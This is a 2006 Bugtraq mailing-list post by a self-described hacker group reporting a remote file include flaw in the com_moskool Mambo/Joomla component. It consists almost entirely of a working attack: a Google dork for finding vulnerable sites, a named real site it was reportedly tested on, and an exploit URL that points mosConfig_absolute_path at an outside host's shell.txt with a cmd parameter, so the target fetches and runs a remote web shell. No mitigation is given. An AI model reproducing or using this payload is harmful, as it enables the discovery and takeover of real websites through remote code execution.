com_moskool (admin.moskool.php) Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: com_moskool (admin.moskool.php) Remote File Include Vulnerabilities
From: saudi.unix@xxxxxxxxxxx
Date: 30 Jul 2006 00:19:14 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

By saudi hackrz

Rish : High
---------------------------------------
test on tis site : www.filters.ru
---------------------------------------

google : allinurl:"com_moskool" or "moskool"

Exploit :

http://[target]/component/option,com_moskool/Itemid,34/admin.moskool.php?mosConfig_absolute_path?=http://sit/shell.txt?cmd

---------------------------------------

- SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB,

------------------------------------------------------------------------

-------

Contact:

~~~~~~~

Nick: saudi hackrz

E-mail: saudi.unix[at]hotmail[dot]Com

site: http://www.3asfh.net

End :)

Prev by Date: Re: PHP ip2long() function circumvention
Next by Date: ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure
Previous by thread: UPDATE: [ GLSA 200605-08 ] PHP: Multiple vulnerabilities
Next by thread: ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure
Index(es):
- Date
- Thread